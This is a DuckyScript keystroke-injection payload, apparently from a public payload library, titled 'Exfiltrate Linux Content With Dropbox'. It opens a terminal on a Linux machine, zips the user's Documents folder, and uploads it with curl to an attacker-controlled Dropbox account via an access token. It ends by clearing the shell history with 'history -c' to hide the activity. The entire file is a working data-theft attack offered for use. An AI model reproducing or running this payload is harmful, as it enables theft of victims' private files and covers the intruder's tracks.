Path: blob/master/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt
2968 views
REM ##########################################################1REM # |2REM # Title : Exfiltrate Linux Content With Dropbox |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Exfiltration, Execution |6REM # Target : Linux |7REM # |8REM ##########################################################910REM Requirements:11REM - Internet Connection12REM - Dropbox Account13REM - - DROPBOX_ACCESS_TOKEN141516DELAY 100017CTRL-ALT t1819DELAY 200020REM Required: Set here your Dropbox access TOKEN21DEFINE TOKEN example22STRING ACCESS_TOKEN="23STRING TOKEN24STRING "25ENTER2627DELAY 50028STRING USER_NAME=$(whoami)29ENTER3031DELAY 50032STRING path="/home/$USER_NAME/Documents"33ENTER3435DELAY 50036STRING RANDOM=$(shuf -i 1-999999999999 -n 1)37ENTER3839DELAY 50040STRING NAME="$RANDOM.zip"41ENTER4243DELAY 50044STRING ZIP_PATH="$path/$NAME"45ENTER4647DELAY 50048REM The FOLDER that you want to zip, in this example you want to zip all Documents content49STRING FOLDER="/home/$USER_NAME/Documents/"50ENTER5152REM Delay for zipping operation, it depends by computer power and folder directory53DELAY 100005455DELAY 50056STRING if [ -r "$FOLDER" ]; then57ENTER58STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&159ENTER60STRING else61ENTER62STRING echo ""63ENTER64STRING fi65ENTER6667DELAY 50068STRING DROPBOX_FOLDER="/$NAME"69ENTER707172DELAY 50073DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload74STRING curl -X POST75STRING DROPBOX_API_CONST76STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"77ENTER7879DELAY 200080STRING history -c81ENTER828384